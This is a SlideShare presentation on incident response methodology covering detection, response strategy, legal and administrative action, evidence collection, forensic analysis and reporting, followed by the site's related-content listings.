SlideShare a Scribd company logo

Incident response methodology

Piyush Jain, profile picture
Piyush Jain

Incident response methodology involves responding to and managing cyber attacks through investigation, containment, eradication, recovery and lessons learned. A well-developed incident response plan is needed to minimize damage from attacks and data breaches, and recover as quickly as possible. Key aspects of incident response include detecting incidents, formulating response strategies, investigating through data collection and forensic analysis, and reporting findings. The goal is to understand attack methods and prevent future incidents.

Technology
1 of 24
Downloaded 79 times
1
2
Most read
3
Most read
4
Most read
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
Incident Response Methodology
Incident response is the methodology an organization uses to respond to and manage a cyber attack. An attack or data breach can potentially affecting customers, intellectual property company time and resources, and brand value. An incident response aims to reduce this damage and recover as quickly as possible. Investigation is also a key component in order to learn from the attack and better prepare for the future. Because many companies today experience a breach at some point in time, a well-developed and repeatable incident response plan is the best way to protect your company. Introduction
An incident can be defined as any event that disrupts the normal operating procedures and leads to some level of crisis which may further result in financial, operational, reputational and legal impacts on the organization. Some computer security incidents that can interrupt the smooth functioning of a business are: ● Worm Infection ● Windows / Unix Intrusions ● DDos ● Website Defacement ● Social Engineering ● Information Leakage ● Phishing What is an Incident?
● Event: ○ An event is any occurrence of an unexpected change. Like for example, a system crash. ● Incident Response Team ○ The incident response team includes individuals with expertise necessary to properly assess the incident and make decisions regarding the proper course of action. ● Incident Response Methodology ○ In order to properly assess and make right decisions about the incident we need a plan. An response methodology is a systematic methods or simply guidelines that need to be followed when an incident occurs. ● Incident Investigation ○ To determine the course of the incident, to collect evidence and produce it in the court during trial we need to do thorough research. Components of an Incident
An Incident Response team is a group of people who are forensics expert and are always prepared for an respond to any emergency incident, such as a natural disaster or an interruption of business operations due to any cyber-crime. Objective of Incident Response team: ● Confirm that an incident has occurred and the system were compromised ● Maintain or restore business continuity ● Lessen the incident impact. ● Try to find out how the attack was done ● Preventive steps for future incidents ● Improve security and incident response approach Incident Response Team
● Pre-incident preparation ● Detection of incidents ● Initial response ● Formulate response strategy ● Investigate the incident ● Reporting ● Resolution Incident Response Methodology
Incident Response Methodology
If an organization cannot detect incidents effectively, it cannot succeed in responding to incidents. Therefore, the detection of incidents phase is one of the most important aspects of incident response. It is also one of the most decentralized phases, in which those with incident response expertise have the least control. Organizations must have a well-documented and simple mechanism for reporting incidents. This is critical to establish accurate metrics, which is often required to obtain the proper budget required for an organization’s incident response capability. Detection of Incidents
● The goal of the response strategy formulation phase is to determine the most appropriate response strategy, given the circumstances of the incident. ● The strategy should take into consideration the political, technical, legal, and business factors that surround the incident. ● The final solution depends on the objectives of the group or individual with responsibility for selecting the strategy. Formulate a Response Strategy 1. Considering the Totality of the Circumstances 2. Considering Appropriate Responses 3. Taking Action i. - Legal Action ii. - Administrative Action Following important points can be considered:
1. Considering the Totality of the Circumstances Response strategies will vary based on the circumstances of the computer security incident. The following factors need to be considered when deciding how many resources are needed to investigate an incident and other aspects of your response strategy: ➢ How critical are the affected systems? ➢ How sensitive is the compromised or stolen information? ➢ Who are the potential perpetrators? ➢ Is the incident known to the public? ➢ What is the level of unauthorized access attained by the attacker? ➢ What is the apparent skill of the attacker? ➢ How much system and user downtime is involved? ➢ What is the overall dollar loss?
1. Considering the Totality of the Circumstances Details obtained during the initial response can be critical when choosing a response strategy. For example, a DoS attack originating from a university may be handled much differently from how an equivalent DoS attack originating from a competitor is handled. Before the response strategy is chosen, it may become necessary to reinvestigate details of the incident. Factors other than the details of the incident will contribute to the response strategy. Most notably, your organization’s response posture plays a large role in your response strategy. Your response posture is your capacity to respond, determined by your technical resources, political considerations, legal constraints, and business objectives.
2. Considering Appropriate Responses Following table shows some common situations with response strategies and potential outcomes. As you can see, the response strategy determines how you get from an incident to an outcome.
2. Considering Appropriate Responses
3. Taking Action An organization will need to take action to discipline an employee or to respond to a malicious act by an outsider. When the incident warrants, this action can be initiated with a criminal referral, a civil complaint, or some administrative reprimand or privilege revocation. Legal Action: It is not uncommon to investigate a computer security incident that is actionable, or could lead to a lawsuit or court proceeding. The two potential legal choices are to file a civil complaint or to notify law enforcement. Law enforcement involvement will reduce the autonomy that your organization has in dealing with an incident, and careful deliberation should occur before you engage the appropriate authorities. In cases where your organization feels compelled to notify law enforcement, you may want to determine the amount of effort and resources you want to invest in the investigation before bringing in a law enforcement agency.
3. Taking Action The following criteria should be considered when deciding whether to include law enforcement in the incident response: ➢ Does the damage/cost of the incident merit a criminal referral? ➢ Is it likely that civil or criminal action will achieve the outcome desired by your organization? (Can you recover damages or receive restitution from the offending party?) ➢ Has the cause of the incident been reasonably established? (Law enforcement officers are not computer security professionals.) ➢ Does your organization have proper documentation and an organized report that will be conducive to an effective investigation? ➢ Can tangible investigative leads be provided to law enforcement officials for them to act on? ➢ Is your organization willing to risk public exposure? ➢ Does the past performance of the individual merit any legal action? ➢ How will law enforcement involvement impact business operations?
3. Taking Action Administrative Action: Disciplining or terminating employees via administrative measures is currently more common than initiating civil or criminal actions. Some administrative actions that can be implemented to discipline internal employees include the following: ➢ Letter of reprimand ➢ Immediate dismissal ➢ Mandatory leave of absence for a specific length of time (paid or unpaid) ➢ Reassignment of job duties (diminished responsibility) ➢ Temporary reduction in pay to account for losses/damage ➢ Public/private apology for actions conducted ➢ Withdrawal of certain privileges, such as network or web access
Data collection is the accumulation of facts and clues that should be considered during your forensic analysis. The data you collect forms the basis of your conclusions. Data collection involves several unique forensic challenges: ● You must collect electronic data in a forensically sound manner. ● You are often collecting more data than you can read in your lifetime (computer storage capacity continues to grow). ● You must handle the data you collect in a manner that protects its integrity (evidence handling). Data Collection
Host-based Information: Host-based evidence includes logs, records, documents, and any other information that is found on a system and not obtained from network-based nodes. For example, host-based information might be a system backup that harbors evidence at a specific period in time. Network-based Evidence: Network-based evidence includes information obtained from the sources like: IDS logs, Consensual monitoring logs, Nonconsensual wiretaps, Pen-register/trap and traces, Router logs, Firewall log, Authentication servers. Data Collection
In the aftermath of a security incident or breach, clients often need Security experts to carry out an incident response plan and perform Forensic Analysis. Forensic analysis includes reviewing all the data collected. This includes reviewing log files, system configuration files, trust relationships, web browser history files, email messages and their attachments, installed applications, and graphic files. You perform software analysis, review time/date stamps, perform keyword searches, and take any other necessary investigative steps. Forensic analyst also prepare digital evidence, which is admissible in court and work hand-in-hand with law enforcement and our clients on evidence gathering. Forensic Analysis
Performing Forensic Analysis
Reporting can be the most difficult phase of the incident response process. The challenge is to create reports that accurately describe the details of an incident, that are understandable to decision makers, that can withstand the barrage of legal scrutiny, and that are produced in a timely manner. Reports are also often used by investigators to refresh their recollections during criminal trials and in training employees new to the field of computer forensics. Some guidelines to make report: ● Document immediately ● Write concisely and clearly ● Use a standard format ● Use editors Reporting
● Document immediately: All investigative steps and conclusions need to be documented as soon as possible. Writing something clearly and concisely at the moment you discover evidence saves time, promotes accuracy, and ensures that the details of the investigation can be communicated more clearly to others at any moment, which is critical if new personnel become involved or are assigned to lead the investigation. ● Write concisely and clearly: Enforce the “write it tight” philosophy. Documenting investigative steps requires discipline and organization. Write everything down in a fashion that is understandable to you and others. Discourage shorthand or shortcuts. Reporting
● Use a standard format: Develop a format for your reports and stick to it. Create forms, outlines, and templates that organize the response process and encourage the recording of all relevant data. ● Use editors: Employ technical editors to read your forensic reports. This helps develop reports that are comprehensible to non technical personnel who have an impact on your incident response strategy and resolution. Reporting
Thank You

More Related Content

PPTX
Incident response
Anshul Gupta
 
PPTX
Incident response process
Bhupeshkumar Nanhe
 
PPT
Incident handling.final
ahmad abdelhafeez
 
PPTX
E-mail Investigation
edwardbel
 
PPTX
Computer forensic ppt
Priya Manik
 
PPTX
Digital forensics
Vidoushi B-Somrah
 
PPTX
Network forensics and investigating logs
anilinvns
 
PPTX
Network Forensics
primeteacher32
 
Incident response
Anshul Gupta
 
Incident response process
Bhupeshkumar Nanhe
 
Incident handling.final
ahmad abdelhafeez
 
E-mail Investigation
edwardbel
 
Computer forensic ppt
Priya Manik
 
Digital forensics
Vidoushi B-Somrah
 
Network forensics and investigating logs
anilinvns
 
Network Forensics
primeteacher32
 

What's hot (20)

PDF
04 Evidence Collection and Data Seizure - Notes
Kranthi
 
PPTX
L6 Digital Forensic Investigation Tools.pptx
Bhupeshkumar Nanhe
 
PDF
Cloud-forensics
anupriti
 
PPTX
Digital forensics
Roberto Ellis
 
PPTX
Forensic imaging
DINESH KAMBLE
 
PPTX
Digital Forensic ppt
Suchita Rawat
 
PPTX
Digital forensics
vishnuv43
 
PPTX
Autopsy Digital forensics tool
Sreekanth Narendran
 
PDF
Social Media Forensics
John J. Carney, Esq.
 
PPTX
Digital Evidence by Raghu Khimani
Dr Raghu Khimani
 
PDF
Wired and Wireless Network Forensics
Savvius, Inc
 
PPTX
Difference between Cyber and digital Forensic.pptx
Applied Forensic Research Sciences
 
PPTX
Intro to cyber forensics
Chaitanya Dhareshwar
 
PPTX
Computer forensics ppt
Nikhil Mashruwala
 
PPTX
Network forensic
Manjushree Mashal
 
PPTX
Computer forensics toolkit
Milap Oza
 
PPTX
Data recovery tools
university of Gujrat, pakistan
 
PPTX
cyber security and forensic tools
Sonu Sunaliya
 
PPTX
Introduction to Incident Response Management
Don Caeiro
 
PPTX
Cyber forensics ppt
RoshiniVijayakumar1
 
04 Evidence Collection and Data Seizure - Notes
Kranthi
 
L6 Digital Forensic Investigation Tools.pptx
Bhupeshkumar Nanhe
 
Cloud-forensics
anupriti
 
Digital forensics
Roberto Ellis
 
Forensic imaging
DINESH KAMBLE
 
Digital Forensic ppt
Suchita Rawat
 
Digital forensics
vishnuv43
 
Autopsy Digital forensics tool
Sreekanth Narendran
 
Social Media Forensics
John J. Carney, Esq.
 
Digital Evidence by Raghu Khimani
Dr Raghu Khimani
 
Wired and Wireless Network Forensics
Savvius, Inc
 
Difference between Cyber and digital Forensic.pptx
Applied Forensic Research Sciences
 
Intro to cyber forensics
Chaitanya Dhareshwar
 
Computer forensics ppt
Nikhil Mashruwala
 
Network forensic
Manjushree Mashal
 
Computer forensics toolkit
Milap Oza
 
Data recovery tools
university of Gujrat, pakistan
 
cyber security and forensic tools
Sonu Sunaliya
 
Introduction to Incident Response Management
Don Caeiro
 
Cyber forensics ppt
RoshiniVijayakumar1
 
Ad

Similar to Incident response methodology (20)

PPTX
Lecture 06 - Incident Management and SOC.pptx
prasadsanjaya2
 
PDF
Thinking Ahead to Litigation While Developing Cybersecurity Plans
Jason Glass, CFA, CISSP
 
DOCX
Incident ResponseAs a security professional, you will.docx
MARRY7
 
PPTX
Incident Response Security
ssuser30902e
 
DOCX
Winchester Aquarium and Pet Center Incident Response Plan
R. Curtis Roth
 
PDF
Practical Guide to Managing Incidents Using LLM's and NLP.pdf
Chris Galvan
 
PPT
11-Incident Response, Risk Management Sample Question and Answer-24-06-2023.ppt
abhichowdary16
 
DOC
Automated Incident Handling Using SIM
Anton Chuvakin
 
PDF
criminal_division_guidance_on_best_practices_for_victim_response_and_reportin...
Jon Polenberg
 
PDF
July CLE Webinar material: Best Practices for Victim Response and Reporting o...
LexisNexis
 
PPTX
IT Security and Management - Semi Finals by Mark John Lado
Mark John Lado, MIT
 
PDF
Ijnsa050201
IJNSA Journal
 
PPTX
Cyber Incident Response - When it happens, will you be ready?
Dan Michaluk
 
PPTX
First Responders Course - Session 3 - Monitoring and Controlling Incident Costs
Phil Huggins FBCS CITP
 
PPTX
Cybersecurity Crisis Management Introduction
Naor Penso
 
PDF
Preparing for future attacks - the right security strategy
RapidSSLOnline.com
 
PDF
Future Cyber Attacks & Solution - Symantec
CheapSSLsecurity
 
PDF
File000119
Desmond Devendran
 
PDF
Sensitive Data Exposure Incident Checklist
- Mark - Fullbright
 
PDF
INCIDENT RESPONSE PLAN FOR A SMALL TO MEDIUM SIZED HOSPITAL
IJNSA Journal
 
Lecture 06 - Incident Management and SOC.pptx
prasadsanjaya2
 
Thinking Ahead to Litigation While Developing Cybersecurity Plans
Jason Glass, CFA, CISSP
 
Incident ResponseAs a security professional, you will.docx
MARRY7
 
Incident Response Security
ssuser30902e
 
Winchester Aquarium and Pet Center Incident Response Plan
R. Curtis Roth
 
Practical Guide to Managing Incidents Using LLM's and NLP.pdf
Chris Galvan
 
11-Incident Response, Risk Management Sample Question and Answer-24-06-2023.ppt
abhichowdary16
 
Automated Incident Handling Using SIM
Anton Chuvakin
 
criminal_division_guidance_on_best_practices_for_victim_response_and_reportin...
Jon Polenberg
 
July CLE Webinar material: Best Practices for Victim Response and Reporting o...
LexisNexis
 
IT Security and Management - Semi Finals by Mark John Lado
Mark John Lado, MIT
 
Ijnsa050201
IJNSA Journal
 
Cyber Incident Response - When it happens, will you be ready?
Dan Michaluk
 
First Responders Course - Session 3 - Monitoring and Controlling Incident Costs
Phil Huggins FBCS CITP
 
Cybersecurity Crisis Management Introduction
Naor Penso
 
Preparing for future attacks - the right security strategy
RapidSSLOnline.com
 
Future Cyber Attacks & Solution - Symantec
CheapSSLsecurity
 
File000119
Desmond Devendran
 
Sensitive Data Exposure Incident Checklist
- Mark - Fullbright
 
INCIDENT RESPONSE PLAN FOR A SMALL TO MEDIUM SIZED HOSPITAL
IJNSA Journal
 
Ad

More from Piyush Jain (6)

PPTX
Logging, monitoring and auditing
Piyush Jain
 
PDF
Understanding security operation.pptx
Piyush Jain
 
PPTX
Identity and access management
Piyush Jain
 
PPTX
Security architecture, engineering and operations
Piyush Jain
 
PPT
Assembly language
Piyush Jain
 
PPT
Windows internals
Piyush Jain
 
Logging, monitoring and auditing
Piyush Jain
 
Understanding security operation.pptx
Piyush Jain
 
Identity and access management
Piyush Jain
 
Security architecture, engineering and operations
Piyush Jain
 
Assembly language
Piyush Jain
 
Windows internals
Piyush Jain
 

Recently uploaded (20)

PDF
Modernizing your data center with Dell and AMD
Principled Technologies
 
PPTX
20250228 LYD VKU AI Blended-Learning.pptx
DatVoNgoc
 
PPTX
Cloud computing and distributed systems.
kkkkkhan
 
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
PDF
Machine learning based COVID-19 study performance prediction
IAESIJAI
 
DOCX
The AUB Centre for AI in Media Proposal.docx
GAONE9
 
PDF
solutions_manual_-_materials___processing_in_manufacturing__demargo_.pdf
AbdullahSani29
 
PPTX
breach-and-attack-simulation-cybersecurity-india-chennai-defenderrabbit-2025....
defencerabbit Team
 
PDF
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
PDF
GDG Cloud Iasi [PUBLIC] Florian Blaga - Unveiling the Evolution of Cybersecur...
athlonica
 
PPTX
PA Analog/Digital System: The Backbone of Modern Surveillance and Communication
AVTRON Technologies LLC
 
PDF
KodekX | Application Modernization Development
KodekX
 
PDF
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
SynapseIndia
 
PDF
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
PPTX
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
IAESIJAI
 
PDF
GamePlan Trading System Review: Professional Trader's Honest Take
SOFTTECHHUB
 
PDF
Advanced IT Governance
University of Hertfordshire
 
PDF
NewMind AI Monthly Chronicles - July 2025
NewMind AI
 
Modernizing your data center with Dell and AMD
Principled Technologies
 
20250228 LYD VKU AI Blended-Learning.pptx
DatVoNgoc
 
Cloud computing and distributed systems.
kkkkkhan
 
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
Machine learning based COVID-19 study performance prediction
IAESIJAI
 
The AUB Centre for AI in Media Proposal.docx
GAONE9
 
solutions_manual_-_materials___processing_in_manufacturing__demargo_.pdf
AbdullahSani29
 
breach-and-attack-simulation-cybersecurity-india-chennai-defenderrabbit-2025....
defencerabbit Team
 
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
GDG Cloud Iasi [PUBLIC] Florian Blaga - Unveiling the Evolution of Cybersecur...
athlonica
 
PA Analog/Digital System: The Backbone of Modern Surveillance and Communication
AVTRON Technologies LLC
 
KodekX | Application Modernization Development
KodekX
 
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
SynapseIndia
 
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
Per capita expenditure prediction using model stacking based on satellite ima...
IAESIJAI
 
GamePlan Trading System Review: Professional Trader's Honest Take
SOFTTECHHUB
 
Advanced IT Governance
University of Hertfordshire
 
NewMind AI Monthly Chronicles - July 2025
NewMind AI
 

Incident response methodology

  • 2. Incident response is the methodology an organization uses to respond to and manage a cyber attack. An attack or data breach can potentially affecting customers, intellectual property company time and resources, and brand value. An incident response aims to reduce this damage and recover as quickly as possible. Investigation is also a key component in order to learn from the attack and better prepare for the future. Because many companies today experience a breach at some point in time, a well-developed and repeatable incident response plan is the best way to protect your company. Introduction
  • 3. An incident can be defined as any event that disrupts the normal operating procedures and leads to some level of crisis which may further result in financial, operational, reputational and legal impacts on the organization. Some computer security incidents that can interrupt the smooth functioning of a business are: ● Worm Infection ● Windows / Unix Intrusions ● DDos ● Website Defacement ● Social Engineering ● Information Leakage ● Phishing What is an Incident?
  • 4. ● Event: ○ An event is any occurrence of an unexpected change. Like for example, a system crash. ● Incident Response Team ○ The incident response team includes individuals with expertise necessary to properly assess the incident and make decisions regarding the proper course of action. ● Incident Response Methodology ○ In order to properly assess and make right decisions about the incident we need a plan. An response methodology is a systematic methods or simply guidelines that need to be followed when an incident occurs. ● Incident Investigation ○ To determine the course of the incident, to collect evidence and produce it in the court during trial we need to do thorough research. Components of an Incident
  • 5. An Incident Response team is a group of people who are forensics expert and are always prepared for an respond to any emergency incident, such as a natural disaster or an interruption of business operations due to any cyber-crime. Objective of Incident Response team: ● Confirm that an incident has occurred and the system were compromised ● Maintain or restore business continuity ● Lessen the incident impact. ● Try to find out how the attack was done ● Preventive steps for future incidents ● Improve security and incident response approach Incident Response Team
  • 6. ● Pre-incident preparation ● Detection of incidents ● Initial response ● Formulate response strategy ● Investigate the incident ● Reporting ● Resolution Incident Response Methodology
  • 8. If an organization cannot detect incidents effectively, it cannot succeed in responding to incidents. Therefore, the detection of incidents phase is one of the most important aspects of incident response. It is also one of the most decentralized phases, in which those with incident response expertise have the least control. Organizations must have a well-documented and simple mechanism for reporting incidents. This is critical to establish accurate metrics, which is often required to obtain the proper budget required for an organization’s incident response capability. Detection of Incidents
  • 9. ● The goal of the response strategy formulation phase is to determine the most appropriate response strategy, given the circumstances of the incident. ● The strategy should take into consideration the political, technical, legal, and business factors that surround the incident. ● The final solution depends on the objectives of the group or individual with responsibility for selecting the strategy. Formulate a Response Strategy 1. Considering the Totality of the Circumstances 2. Considering Appropriate Responses 3. Taking Action i. - Legal Action ii. - Administrative Action Following important points can be considered:
  • 10. 1. Considering the Totality of the Circumstances Response strategies will vary based on the circumstances of the computer security incident. The following factors need to be considered when deciding how many resources are needed to investigate an incident and other aspects of your response strategy: ➢ How critical are the affected systems? ➢ How sensitive is the compromised or stolen information? ➢ Who are the potential perpetrators? ➢ Is the incident known to the public? ➢ What is the level of unauthorized access attained by the attacker? ➢ What is the apparent skill of the attacker? ➢ How much system and user downtime is involved? ➢ What is the overall dollar loss?
  • 11. 1. Considering the Totality of the Circumstances Details obtained during the initial response can be critical when choosing a response strategy. For example, a DoS attack originating from a university may be handled much differently from how an equivalent DoS attack originating from a competitor is handled. Before the response strategy is chosen, it may become necessary to reinvestigate details of the incident. Factors other than the details of the incident will contribute to the response strategy. Most notably, your organization’s response posture plays a large role in your response strategy. Your response posture is your capacity to respond, determined by your technical resources, political considerations, legal constraints, and business objectives.
  • 12. 2. Considering Appropriate Responses Following table shows some common situations with response strategies and potential outcomes. As you can see, the response strategy determines how you get from an incident to an outcome.
  • 14. 3. Taking Action An organization will need to take action to discipline an employee or to respond to a malicious act by an outsider. When the incident warrants, this action can be initiated with a criminal referral, a civil complaint, or some administrative reprimand or privilege revocation. Legal Action: It is not uncommon to investigate a computer security incident that is actionable, or could lead to a lawsuit or court proceeding. The two potential legal choices are to file a civil complaint or to notify law enforcement. Law enforcement involvement will reduce the autonomy that your organization has in dealing with an incident, and careful deliberation should occur before you engage the appropriate authorities. In cases where your organization feels compelled to notify law enforcement, you may want to determine the amount of effort and resources you want to invest in the investigation before bringing in a law enforcement agency.
  • 15. 3. Taking Action The following criteria should be considered when deciding whether to include law enforcement in the incident response: ➢ Does the damage/cost of the incident merit a criminal referral? ➢ Is it likely that civil or criminal action will achieve the outcome desired by your organization? (Can you recover damages or receive restitution from the offending party?) ➢ Has the cause of the incident been reasonably established? (Law enforcement officers are not computer security professionals.) ➢ Does your organization have proper documentation and an organized report that will be conducive to an effective investigation? ➢ Can tangible investigative leads be provided to law enforcement officials for them to act on? ➢ Is your organization willing to risk public exposure? ➢ Does the past performance of the individual merit any legal action? ➢ How will law enforcement involvement impact business operations?
  • 16. 3. Taking Action Administrative Action: Disciplining or terminating employees via administrative measures is currently more common than initiating civil or criminal actions. Some administrative actions that can be implemented to discipline internal employees include the following: ➢ Letter of reprimand ➢ Immediate dismissal ➢ Mandatory leave of absence for a specific length of time (paid or unpaid) ➢ Reassignment of job duties (diminished responsibility) ➢ Temporary reduction in pay to account for losses/damage ➢ Public/private apology for actions conducted ➢ Withdrawal of certain privileges, such as network or web access
  • 17. Data collection is the accumulation of facts and clues that should be considered during your forensic analysis. The data you collect forms the basis of your conclusions. Data collection involves several unique forensic challenges: ● You must collect electronic data in a forensically sound manner. ● You are often collecting more data than you can read in your lifetime (computer storage capacity continues to grow). ● You must handle the data you collect in a manner that protects its integrity (evidence handling). Data Collection
  • 18. Host-based Information: Host-based evidence includes logs, records, documents, and any other information that is found on a system and not obtained from network-based nodes. For example, host-based information might be a system backup that harbors evidence at a specific period in time. Network-based Evidence: Network-based evidence includes information obtained from the sources like: IDS logs, Consensual monitoring logs, Nonconsensual wiretaps, Pen-register/trap and traces, Router logs, Firewall log, Authentication servers. Data Collection
  • 19. In the aftermath of a security incident or breach, clients often need Security experts to carry out an incident response plan and perform Forensic Analysis. Forensic analysis includes reviewing all the data collected. This includes reviewing log files, system configuration files, trust relationships, web browser history files, email messages and their attachments, installed applications, and graphic files. You perform software analysis, review time/date stamps, perform keyword searches, and take any other necessary investigative steps. Forensic analyst also prepare digital evidence, which is admissible in court and work hand-in-hand with law enforcement and our clients on evidence gathering. Forensic Analysis
  • 21. Reporting can be the most difficult phase of the incident response process. The challenge is to create reports that accurately describe the details of an incident, that are understandable to decision makers, that can withstand the barrage of legal scrutiny, and that are produced in a timely manner. Reports are also often used by investigators to refresh their recollections during criminal trials and in training employees new to the field of computer forensics. Some guidelines to make report: ● Document immediately ● Write concisely and clearly ● Use a standard format ● Use editors Reporting
  • 22. ● Document immediately: All investigative steps and conclusions need to be documented as soon as possible. Writing something clearly and concisely at the moment you discover evidence saves time, promotes accuracy, and ensures that the details of the investigation can be communicated more clearly to others at any moment, which is critical if new personnel become involved or are assigned to lead the investigation. ● Write concisely and clearly: Enforce the “write it tight” philosophy. Documenting investigative steps requires discipline and organization. Write everything down in a fashion that is understandable to you and others. Discourage shorthand or shortcuts. Reporting
  • 23. ● Use a standard format: Develop a format for your reports and stick to it. Create forms, outlines, and templates that organize the response process and encourage the recording of all relevant data. ● Use editors: Employ technical editors to read your forensic reports. This helps develop reports that are comprehensible to non technical personnel who have an impact on your incident response strategy and resolution. Reporting